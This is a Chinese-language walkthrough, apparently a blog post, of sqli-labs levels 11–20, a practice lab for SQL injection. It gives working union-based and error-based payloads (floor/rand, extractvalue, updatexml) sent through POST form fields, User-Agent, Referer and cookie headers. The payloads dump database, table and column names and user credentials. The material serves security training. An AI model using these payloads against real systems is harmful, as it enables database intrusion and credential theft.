Less-11
首先在输入框里随便输入账号密码,可以看到URL里无任何变化,所以这关是POST传递了。
但是不管是怎么传递的,数据在传输到后台的处理是相同的,后台sql语句照样可以被我们修改。
我们先输账号为:
admin'
密码为:
123
可以看到
123被单引号括住,说明是单引号闭合型。
接下来输入账号为:
admin'#
,密码为:
123
可以看到,页面显示
正确进入,而且还有两个显示位面。这就基本上和第一关一样,用联合注入。思路和第一关差不多,先输入一个不存在的用户名使前半部分报错
0admin' order by 3#
,(注意这里注释的话要用#,用–+页面会报错的)
页面错误,将3改为2,页面正常。所以有两个字段,之后的步骤参考第一关的详细步骤
在这里只把代码写上
爆数据库名:Username:
0admin' union select 1,database()#
Password:随便输入。
爆数据表名:Username:
0admin' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),2#
爆字段名:Username:
0admin' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')#
爆所有数据:Username:
0admin' union select (select group_concat(username) from security.users),(select group_concat(password) from security.users)#
Less-12
尝试
admin')
页面错误,
admin")
也面正确,所以这关为
")
闭合型注入,后续步骤参考Less-11。
Less-13
这关为
')
闭合性,但没有显示位,所以要用盲注。详细参考第五关的报错注入
代码如下:
爆数据库:
0admin') union select count(*),concat('~',(select database() ), '~' ,floor(rand(0) *2 ) ) as a from information_schema.tables group by a#
爆数据表:
0admin') union select count(*), concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a#
爆列名:
0admin') union select count(*),concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#
爆用户名:
0admin') union select count(*),concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#
Less-14
这关为
"
闭合性,依旧没有显示位。代码和上一关一样,只需把
')
改为
"
即可。
Less-15
这关为
'
闭合性,代码和13关一样,只需把
')
改为
'
即可。
Less-16
这关为
")
闭合性,代码和13关一样,只需把
')
改为
")
即可。
Less-17
这一关不管怎么找闭合性,都只出现同一串英文字母。翻译一下原来是骂我的,差点就吃了没文化的亏。
看了大佬的博客,原来是后台对传递过去的账号进行了过滤。看看源码
但所幸的是密码没有被过滤,应该可以从密码着手。
Username:
admin
Password:
1' order by 3#
可以看到
有个报错显示,想到可以用报错注入。
爆数据库:Username:
admin
Password:
1'and extractvalue(1,concat(0x7e,(select database()),0x7e))#&sub mit=Submit
爆数据表:Password:
1'and extractvalue(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),0x7e))#&sub mit=Submit
但是,到这里发现只出现了一个表名
那这样好像进行不下去了。参考大佬的博客,得知
可以使用updatexml函数。
(1)
updatexml()
函数是MySQL对xml文档数据进行查询和修改的xpath函数
(2)
updatexml(xml_target,xpath_expr,new_xml)
(3)
xml_target
:原来的xml,也就是要替换的目标;
(4)
xpath_expr
:xpath的表达式;
(5)
new_xml
:替换后的xml;
(6)这一段的意思就是,用
new_xml
把
xml_target
中包含
xpath_expr
的部分节点(包括
xml_target
)替换掉。
在注入时,
' or updatexml(1,concat('#',(Clause)),1)#
这时,Clause就是我们需要用到的子句了。
原文链接:https://blog.csdn.net/weixin_43733035/article/details/86561654
爆完整的列名
Password:
' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
爆字段名:
' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1)#
查询数据时,并不能直接用简单的
select concat(username)
,这样会引起报错。
因为在同一个语句中,不能先查询表中的值再update这个表,可以先把查询出的值作为一个派生表,然后在这个派生表里面再次进行查询。
爆数据:
' or updatexml(1,concat('#',(select * from (select concat_ws (' ',id,username,password) from users limit 0,1) a)),1)#
然后修改limit的值就可以查到所有数据。
Less-18
这一关看了原发发现,对Username和Password都进行了过滤
那这样的话就不能在输入框里进行注入了。
但是在源码中看到了
看到了将 useragent 和 ip 插入到数据库中,ip修改起来比较麻烦,但useragent可以抓包改包。
抓包修改后,正确登录进去发现,怎么修改怎么显示。
查数据存在哪个数据库
' or updatexml(1,concat('#',(select database()),'#'),1),1,1)#
查所有数据库
' or updatexml(1,concat('#',(select concat(table_name) from information_schema.tables where table_schema='security' limit 1,1),'#'),1),1,1)#
这里需要注意
updatexml
函数,源码的insert语句中要插入三个数据,所以要有三个1,保持字段一致。
Less-19
登录之后发现,显示了Referer,所以抓包修改Referer就行了,参考Less-18.
Less-20
输入正确的用户登录进去发现,有很多显示的地方
抓到包挨个注入,发现只有修改cookie可以。
' or updatexml(1,concat('#',(select database()),'#'),1)#
然后只要修改查询语句就行了,参考Less-18。